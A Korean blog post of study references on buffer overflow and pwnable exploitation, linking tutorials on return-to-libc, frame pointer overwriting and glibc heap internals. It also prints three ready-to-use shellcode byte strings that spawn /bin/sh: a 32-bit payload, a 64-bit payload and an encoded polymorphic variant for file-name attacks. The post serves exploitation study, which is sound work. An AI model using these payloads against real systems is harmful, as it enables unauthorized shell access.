-
0x01.버퍼 오버플로우(Buffer Overflow)0x.Pwnable 2017. 7. 7. 12:07
0x01.버퍼 오버플로우(Buffer Overflow)
1. 해커 지망자들이 알아야 할 Buffer Overflow Attack의 기초 By 달고나(Wowhacker Team)
buffer_overflow_foundation_pub.pdf
2. 쉘 코드 25 Byte
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
2-1. 쉘 코드 27 Byte (64 비트)
\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
3. 다형성 쉘 코드 (파일 이름 공격)
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
4. Hackerz on the ship(우리집에 GDB 있는데... 메모리 보고갈래?
https://bpsecblog.wordpress.com/2016/03/08/gdb_memory_1/
5. All about RTL(By Wr4ith)
6. Understanding & Using Fake EBP & FPO(Frame Pointer Overwriting)(By Symnoisy)
Understading Fake EBP & FPO.pdf
7. Heap Overflows for human 101 한글번역
http://bob3rdnewbie.tistory.com/239
8. 동적 메모리 관리 분석글(glibc) -> malloc
http://studyfoss.egloos.com/5206220
http://egloos.zum.com/studyfoss/v/5206979
https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/
https://www.lazenca.net/pages/viewpage.action?pageId=1147929
https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_chunk.html
'0x.Pwnable' 카테고리의 다른 글
0x03.Browser Exploit Reference (0) 2019.02.22 0x02.Local Privilege Escalation(LPE) (0) 2019.02.13 0x00.파이프라인(Pipeline) (0) 2017.02.26 댓글